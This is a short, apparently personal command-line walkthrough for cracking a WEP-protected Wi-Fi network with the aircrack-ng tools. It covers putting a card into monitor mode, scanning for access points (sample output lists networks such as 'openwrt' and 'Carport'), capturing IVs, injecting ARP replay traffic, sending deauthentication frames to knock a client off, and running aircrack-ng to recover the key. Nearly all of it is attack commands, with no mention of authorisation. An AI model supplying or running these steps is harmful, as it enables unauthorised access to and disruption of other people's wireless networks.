# airmon-ng start eth1
Interface	Chipset		Driver
eth1		Centrino b/g	ipw2200 (monitor mode enabled)

root@laptopdth:/var/tmp# ifconfig eth1
eth1      Link encap:UNSPEC  HWaddr 00-16-6F-8D-11-F2-48-A3-00-00-00-00-00-00-00-00  

# airodump-ng eth1

write down ESSID , channel # en BSSID

eg :
BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
00:03:2F:0A:49:B5  218      850      240    2   6  22  WEP  WEP         openwrt
00:1A:92:68:61:AD  176       64        0    0   4  48  WEP  WEP         Carport
BSSID              STATION            PWR   Rate  Lost  Packets  Probes
00:03:2F:0A:49:B5  00:10:C6:55:12:23  218  11-11    75      234

# start logging in one terminal:
#
airodump-ng --ivs -c [channel eg 6] -w [filename] -i eth1

# insert fake traffic in other terminal
#
aireplay-ng --arpreplay -b [macaddress -AP eg 00:03:2F:0A:49:B5] -h [local macaddress of wifi card eg 00:16:6F:8D:11:F2] eth1

# At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again.

To confuse even more: send deauth commands:

aireplay-ng -e openwrt -a 00:03:2F:0A:49:B5 -c 00:10:C6:55:12:23 --deauth 10 eth1

To find key:

aircrack-ng -f 4 -n [128/64] [filename]